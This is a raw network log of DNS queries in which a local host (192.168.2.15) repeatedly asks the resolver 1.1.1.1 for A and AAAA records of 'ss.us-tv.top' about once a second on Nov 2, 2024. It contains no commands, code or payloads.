Nov 2, 2024 04:05:49.208472967 CET	192.168.2.15	1.1.1.1	0xfc0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:50.223216057 CET	192.168.2.15	1.1.1.1	0xb3fa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:50.223289967 CET	192.168.2.15	1.1.1.1	0xc10	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:50.230046034 CET	192.168.2.15	1.1.1.1	0xc10	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:50.230057955 CET	192.168.2.15	1.1.1.1	0xb3fa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:51.248075008 CET	192.168.2.15	1.1.1.1	0x3792	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:51.249332905 CET	192.168.2.15	1.1.1.1	0xe5f7	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:51.255178928 CET	192.168.2.15	1.1.1.1	0x3792	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:51.256314039 CET	192.168.2.15	1.1.1.1	0xe5f7	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:52.273854017 CET	192.168.2.15	1.1.1.1	0x3373	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:52.274008036 CET	192.168.2.15	1.1.1.1	0xb10	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:52.281574965 CET	192.168.2.15	1.1.1.1	0x3373	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:52.281586885 CET	192.168.2.15	1.1.1.1	0xb10	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:53.296520948 CET	192.168.2.15	1.1.1.1	0xde78	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:53.296750069 CET	192.168.2.15	1.1.1.1	0xe7ed	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:53.303796053 CET	192.168.2.15	1.1.1.1	0xde78	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:53.303808928 CET	192.168.2.15	1.1.1.1	0xe7ed	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:54.320297003 CET	192.168.2.15	1.1.1.1	0x8ab9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:54.320439100 CET	192.168.2.15	1.1.1.1	0xab4a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:54.327531099 CET	192.168.2.15	1.1.1.1	0xab4a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:54.327531099 CET	192.168.2.15	1.1.1.1	0x8ab9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:54.339406967 CET	192.168.2.15	1.1.1.1	0xab4a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:55.950200081 CET	192.168.2.15	1.1.1.1	0xcd77	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:55.950350046 CET	192.168.2.15	1.1.1.1	0x4d93	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:55.957850933 CET	192.168.2.15	1.1.1.1	0x4d93	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:55.957870007 CET	192.168.2.15	1.1.1.1	0xcd77	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:55.964725971 CET	192.168.2.15	1.1.1.1	0x4d93	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:57.317881107 CET	192.168.2.15	1.1.1.1	0xab8a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:57.318224907 CET	192.168.2.15	1.1.1.1	0x4376	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:57.324846029 CET	192.168.2.15	1.1.1.1	0xab8a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:57.325158119 CET	192.168.2.15	1.1.1.1	0x4376	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:58.340198994 CET	192.168.2.15	1.1.1.1	0xa0eb	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:58.340483904 CET	192.168.2.15	1.1.1.1	0xe7b4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:58.348258972 CET	192.168.2.15	1.1.1.1	0xe7b4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:58.348346949 CET	192.168.2.15	1.1.1.1	0xa0eb	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:59.364306927 CET	192.168.2.15	1.1.1.1	0xb2b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:59.365209103 CET	192.168.2.15	1.1.1.1	0x2acc	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:59.373029947 CET	192.168.2.15	1.1.1.1	0xb2b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:59.373322010 CET	192.168.2.15	1.1.1.1	0x2acc	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:00.391331911 CET	192.168.2.15	1.1.1.1	0x2ac7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:00.393064976 CET	192.168.2.15	1.1.1.1	0xfe6c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:00.398228884 CET	192.168.2.15	1.1.1.1	0x2ac7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:00.399729013 CET	192.168.2.15	1.1.1.1	0xfe6c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:01.417921066 CET	192.168.2.15	1.1.1.1	0x472c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:01.418328047 CET	192.168.2.15	1.1.1.1	0x636e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:01.426050901 CET	192.168.2.15	1.1.1.1	0x472c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:01.426081896 CET	192.168.2.15	1.1.1.1	0x636e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:02.444830894 CET	192.168.2.15	1.1.1.1	0xd5d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:02.446453094 CET	192.168.2.15	1.1.1.1	0x68df	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:02.451694965 CET	192.168.2.15	1.1.1.1	0xd5d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:02.535264015 CET	192.168.2.15	1.1.1.1	0x68df	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:03.551444054 CET	192.168.2.15	1.1.1.1	0x6aab	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:03.552031040 CET	192.168.2.15	1.1.1.1	0xa9ba	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:03.558979988 CET	192.168.2.15	1.1.1.1	0x6aab	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:03.559400082 CET	192.168.2.15	1.1.1.1	0xa9ba	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:03.566210985 CET	192.168.2.15	1.1.1.1	0xa9ba	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:04.699867964 CET	192.168.2.15	1.1.1.1	0x3052	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:04.700258970 CET	192.168.2.15	1.1.1.1	0xdafa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:04.707108974 CET	192.168.2.15	1.1.1.1	0x3052	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:04.707532883 CET	192.168.2.15	1.1.1.1	0xdafa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:05.721532106 CET	192.168.2.15	1.1.1.1	0x4aee	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:05.721744061 CET	192.168.2.15	1.1.1.1	0xf2fd	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:05.729176044 CET	192.168.2.15	1.1.1.1	0xf2fd	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:05.729211092 CET	192.168.2.15	1.1.1.1	0x4aee	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:06.744323015 CET	192.168.2.15	1.1.1.1	0x5aba	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:06.744414091 CET	192.168.2.15	1.1.1.1	0xe37a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:06.751595020 CET	192.168.2.15	1.1.1.1	0xe37a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:06.753060102 CET	192.168.2.15	1.1.1.1	0x5aba	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:07.769675016 CET	192.168.2.15	1.1.1.1	0x4de0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:07.769768953 CET	192.168.2.15	1.1.1.1	0x95c2	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:07.776968002 CET	192.168.2.15	1.1.1.1	0x4de0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:07.776994944 CET	192.168.2.15	1.1.1.1	0x95c2	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:08.792901039 CET	192.168.2.15	1.1.1.1	0x69a0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:08.793549061 CET	192.168.2.15	1.1.1.1	0x544	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:08.800296068 CET	192.168.2.15	1.1.1.1	0x69a0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:08.800721884 CET	192.168.2.15	1.1.1.1	0x544	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:09.814646959 CET	192.168.2.15	1.1.1.1	0x33da	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:09.814801931 CET	192.168.2.15	1.1.1.1	0x6523	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:09.821901083 CET	192.168.2.15	1.1.1.1	0x6523	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:09.821901083 CET	192.168.2.15	1.1.1.1	0x33da	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:10.837508917 CET	192.168.2.15	1.1.1.1	0x6f30	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:10.837940931 CET	192.168.2.15	1.1.1.1	0x6c72	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:10.845676899 CET	192.168.2.15	1.1.1.1	0x6f30	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:10.845695972 CET	192.168.2.15	1.1.1.1	0x6c72	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:11.860276937 CET	192.168.2.15	1.1.1.1	0x99d6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:11.860562086 CET	192.168.2.15	1.1.1.1	0x2196	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:11.867464066 CET	192.168.2.15	1.1.1.1	0x2196	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:11.867871046 CET	192.168.2.15	1.1.1.1	0x99d6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:12.886015892 CET	192.168.2.15	1.1.1.1	0x5c2b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:12.886507034 CET	192.168.2.15	1.1.1.1	0x6e4f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:12.893277884 CET	192.168.2.15	1.1.1.1	0x5c2b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:12.893680096 CET	192.168.2.15	1.1.1.1	0x6e4f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:13.911778927 CET	192.168.2.15	1.1.1.1	0xe203	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:13.914175034 CET	192.168.2.15	1.1.1.1	0x87fd	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:13.919006109 CET	192.168.2.15	1.1.1.1	0xe203	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:13.921063900 CET	192.168.2.15	1.1.1.1	0x87fd	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:14.934984922 CET	192.168.2.15	1.1.1.1	0xd780	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:14.937668085 CET	192.168.2.15	1.1.1.1	0xa23b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:14.941982985 CET	192.168.2.15	1.1.1.1	0xd780	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:14.945018053 CET	192.168.2.15	1.1.1.1	0xa23b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:15.959530115 CET	192.168.2.15	1.1.1.1	0x88d0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:15.959705114 CET	192.168.2.15	1.1.1.1	0x10e9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:15.966453075 CET	192.168.2.15	1.1.1.1	0x88d0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:15.966839075 CET	192.168.2.15	1.1.1.1	0x10e9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:15.978231907 CET	192.168.2.15	1.1.1.1	0x88d0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:17.632358074 CET	192.168.2.15	1.1.1.1	0xa20e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:17.633173943 CET	192.168.2.15	1.1.1.1	0xa0d1	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:17.639883041 CET	192.168.2.15	1.1.1.1	0xa20e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:17.640274048 CET	192.168.2.15	1.1.1.1	0xa0d1	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:18.653167009 CET	192.168.2.15	1.1.1.1	0x8f0a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:18.654793978 CET	192.168.2.15	1.1.1.1	0xc594	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:18.660006046 CET	192.168.2.15	1.1.1.1	0x8f0a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:18.662166119 CET	192.168.2.15	1.1.1.1	0xc594	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:19.674154997 CET	192.168.2.15	1.1.1.1	0x98d7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:19.674688101 CET	192.168.2.15	1.1.1.1	0x2f0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:19.681296110 CET	192.168.2.15	1.1.1.1	0x98d7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:19.681607962 CET	192.168.2.15	1.1.1.1	0x2f0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:20.694683075 CET	192.168.2.15	1.1.1.1	0xef3b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:20.695205927 CET	192.168.2.15	1.1.1.1	0x189c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:20.702003002 CET	192.168.2.15	1.1.1.1	0xef3b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:20.702030897 CET	192.168.2.15	1.1.1.1	0x189c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:21.714705944 CET	192.168.2.15	1.1.1.1	0x530a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:21.714827061 CET	192.168.2.15	1.1.1.1	0x626e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:21.722127914 CET	192.168.2.15	1.1.1.1	0x530a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:21.722495079 CET	192.168.2.15	1.1.1.1	0x626e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:22.733769894 CET	192.168.2.15	1.1.1.1	0xe325	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:22.734190941 CET	192.168.2.15	1.1.1.1	0x6088	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:22.741282940 CET	192.168.2.15	1.1.1.1	0xe325	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:22.741381884 CET	192.168.2.15	1.1.1.1	0x6088	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:23.757610083 CET	192.168.2.15	1.1.1.1	0xf00	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:23.758080959 CET	192.168.2.15	1.1.1.1	0x17d3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:23.764647007 CET	192.168.2.15	1.1.1.1	0xf00	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:23.764797926 CET	192.168.2.15	1.1.1.1	0x17d3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:24.779485941 CET	192.168.2.15	1.1.1.1	0x69f7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:24.779695988 CET	192.168.2.15	1.1.1.1	0xa0de	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:24.786993027 CET	192.168.2.15	1.1.1.1	0x69f7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:24.787015915 CET	192.168.2.15	1.1.1.1	0xa0de	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:24.793839931 CET	192.168.2.15	1.1.1.1	0x69f7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:26.160618067 CET	192.168.2.15	1.1.1.1	0xd7d8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:26.160787106 CET	192.168.2.15	1.1.1.1	0x5cb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:26.167752981 CET	192.168.2.15	1.1.1.1	0xd7d8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:26.167825937 CET	192.168.2.15	1.1.1.1	0x5cb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:27.184390068 CET	192.168.2.15	1.1.1.1	0x88ab	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:27.184777975 CET	192.168.2.15	1.1.1.1	0xd316	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:27.191227913 CET	192.168.2.15	1.1.1.1	0x88ab	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:27.191335917 CET	192.168.2.15	1.1.1.1	0xd316	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:28.209681988 CET	192.168.2.15	1.1.1.1	0x75ec	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:28.210061073 CET	192.168.2.15	1.1.1.1	0x9693	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:28.217103958 CET	192.168.2.15	1.1.1.1	0x9693	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:28.217122078 CET	192.168.2.15	1.1.1.1	0x75ec	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:29.233443022 CET	192.168.2.15	1.1.1.1	0x540c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:29.234251022 CET	192.168.2.15	1.1.1.1	0x2ce3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:29.240591049 CET	192.168.2.15	1.1.1.1	0x540c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:29.240848064 CET	192.168.2.15	1.1.1.1	0x2ce3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:30.256763935 CET	192.168.2.15	1.1.1.1	0x8b61	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:30.257940054 CET	192.168.2.15	1.1.1.1	0x8b20	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:30.263479948 CET	192.168.2.15	1.1.1.1	0x8b61	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:30.264698982 CET	192.168.2.15	1.1.1.1	0x8b20	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:31.278867960 CET	192.168.2.15	1.1.1.1	0xa0d5	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:31.279055119 CET	192.168.2.15	1.1.1.1	0x5c8a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:31.285840988 CET	192.168.2.15	1.1.1.1	0x5c8a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:31.286175966 CET	192.168.2.15	1.1.1.1	0xa0d5	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:32.302978992 CET	192.168.2.15	1.1.1.1	0xad5f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:32.304709911 CET	192.168.2.15	1.1.1.1	0x7381	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:32.310378075 CET	192.168.2.15	1.1.1.1	0xad5f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:32.311810017 CET	192.168.2.15	1.1.1.1	0x7381	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:33.326150894 CET	192.168.2.15	1.1.1.1	0x816b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:33.326560020 CET	192.168.2.15	1.1.1.1	0xf043	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:33.332917929 CET	192.168.2.15	1.1.1.1	0x816b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:33.333197117 CET	192.168.2.15	1.1.1.1	0xf043	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:34.348388910 CET	192.168.2.15	1.1.1.1	0xd375	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:34.348558903 CET	192.168.2.15	1.1.1.1	0xd813	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:34.355355024 CET	192.168.2.15	1.1.1.1	0xd375	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:34.355658054 CET	192.168.2.15	1.1.1.1	0xd813	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:35.368321896 CET	192.168.2.15	1.1.1.1	0xbbb9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:35.370166063 CET	192.168.2.15	1.1.1.1	0x2bdf	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:35.375394106 CET	192.168.2.15	1.1.1.1	0xbbb9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:35.377304077 CET	192.168.2.15	1.1.1.1	0x2bdf	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:36.392340899 CET	192.168.2.15	1.1.1.1	0x5054	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:36.392992973 CET	192.168.2.15	1.1.1.1	0x27f7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:36.399645090 CET	192.168.2.15	1.1.1.1	0x5054	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:36.399791002 CET	192.168.2.15	1.1.1.1	0x27f7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:36.411170006 CET	192.168.2.15	1.1.1.1	0x5054	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:36.411180973 CET	192.168.2.15	1.1.1.1	0x27f7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:38.026743889 CET	192.168.2.15	1.1.1.1	0xb733	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:38.027043104 CET	192.168.2.15	1.1.1.1	0x4c1b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:38.034029961 CET	192.168.2.15	1.1.1.1	0x4c1b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:38.118906975 CET	192.168.2.15	1.1.1.1	0xb733	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:39.137655020 CET	192.168.2.15	1.1.1.1	0x40c8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:39.138590097 CET	192.168.2.15	1.1.1.1	0x1f80	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:39.144896984 CET	192.168.2.15	1.1.1.1	0x40c8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
